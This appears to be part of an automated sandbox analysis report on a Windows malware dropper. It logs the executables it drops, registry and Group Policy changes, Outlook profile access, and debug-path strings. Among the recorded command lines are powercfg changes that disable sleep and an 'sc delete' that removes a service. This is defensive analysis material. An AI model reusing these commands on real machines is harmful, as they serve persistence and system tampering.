Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process created: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7632 -ip 7632	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBGPQMHF"	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe	Process created: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp "C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp" /SL5="$50440,1578341,54272,C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe"	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBGPQMHF"
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS94A6.tmp\Install.exe .\Install.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7624 -ip 7624
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7632 -ip 7632
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 7616 -ip 7616
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7632 -s 980
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS94A6.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\i1crvbOZAP.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EA502722-A23D-11D1-A7D3-0000F87571E3}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\i1crvbOZAP.exe

File written: C:\Windows\System32\GroupPolicy\gpt.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: i1crvbOZAP.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: i1crvbOZAP.exe

Static file information: File size 3396944 > 1048576

Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: i1crvbOZAP.exe

Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x256a00

Source:	Binary string: \??\C:\Windows\symbols\exe\Immovables.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\exe\Instrumental.pdb source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2139084003.0000000000D79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: nss3.pdb@ source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2648652506.0000000065ADF000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: Instrumental.pdb]9 source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2139084003.0000000000D40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Instrumental.pdbpdbtal.pdb source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2139084003.0000000000D2C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: g1nHVnlr2tXTEWQsRz_M547D.exe, 00000009.00000002.2040474083.0000000005188000.00000004.00000800.00020000.00000000.sdmp, g1nHVnlr2tXTEWQsRz_M547D.exe, 00000009.00000002.2305300505.0000000006594000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \Documents\VS Projects\XFilePumper\obj\Release\XFilePumper.pdb source: i1crvbOZAP.exe, 00000000.00000003.1765747947.0000029626040000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e[C9C:\dijireluw jecifokig b.pdb source: i1crvbOZAP.exe, 00000000.00000003.1782449752.000002962610F000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1780561393.0000029625ED4000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1761238928.0000029625FFE000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1761238928.0000029626005000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: usymbols\exe\Immovables.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2133356336.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: Age does not matchThe module age and .pdb age do not match. source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: mC:\Users\user\Documents\SimpleAdobe\Immovables.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2133356336.0000000000758000.00000004.00000010.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2140687253.0000000000988000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: symsrv.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000C7A000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000037E9000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000C7A000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: Instrumental.pdbmental.pdbpdbtal.pdbtrumental.pdbp source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2133747821.0000000000B3A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Instrumental.pdbUTdd source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2139084003.0000000000D40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: \??\C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.PDB4< source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2139084003.0000000000D40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\Immovables.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\Immovables.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Instrumental.pdb source: i1crvbOZAP.exe, 00000000.00000003.1695585570.0000029625C1E000.00000004.00000020.00020000.00000000.sdmp, fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000000.1838966350.0000000000742000.00000002.00000001.01000000.00000009.sdmp, fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2139084003.0000000000D79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.PDB source: tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\Instrumental.pdb) source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2133747821.0000000000B3A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: \??\C:\Windows\Instrumental.pdb source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2139084003.0000000000D40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: i1crvbOZAP.exe, i1crvbOZAP.exe, 00000000.00000002.1968244486.00007FF64926D000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: ''.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2133356336.0000000000758000.00000004.00000010.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2140687253.0000000000988000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: i1crvbOZAP.exe, 00000000.00000002.1968244486.00007FF6495B3000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: \??\C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.PDB source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symsrv.pdbGCTL source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000C7A000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000037E9000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000C7A000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: EfiGuardDxe.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: C:\zugi\ranadafigoh\n.pdb source: i1crvbOZAP.exe, 00000000.00000003.1682502618.0000029625C4C000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1684301773.0000029625C93000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1684301773.0000029625C1E000.00000004.00000020.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000000.1839020396.0000000000410000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: Signature does not matchThe module signature does not match with .pdb signature source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: \??\C:\Windows\Immovables.pdb source: tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: Immovables.pdb source: i1crvbOZAP.exe, 00000000.00000003.1798566425.0000029625FFE000.00000004.00000020.00020000.00000000.sdmp, cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000000.1837512672.00000000005B2000.00000002.00000001.01000000.00000007.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Documents\SimpleAdobe\Immovables.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdbGCTL source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: \??\C:\Windows\Immovables.pdb(prq source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Loader.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: C:\Windows\Immovables.pdbpdbles.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000ACE000.00000004.00000020.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Instrumental.pdb2 source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2139084003.0000000000D79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mC:\Users\user\Documents\SimpleAdobe\Instrumental.pdbdA source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2133747821.0000000000B3A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: EfiGuardDxe.pdb7 source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2166062465.0000000002B77000.00000040.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\xekuwaziga-duwegoku-xiwefoya\51\ke.pdb source: i1crvbOZAP.exe, 00000000.00000003.1702717873.00000296262CB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1695276080.0000029626011000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1695585570.0000029625C7D000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1695585570.0000029625C84000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701959181.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1698528144.0000029626043000.00000004.00000020.00020000.00000000.sdmp, KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000000.1839069836.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000000.1839093609.0000000000410000.00000002.00000001.01000000.0000000C.sdmp
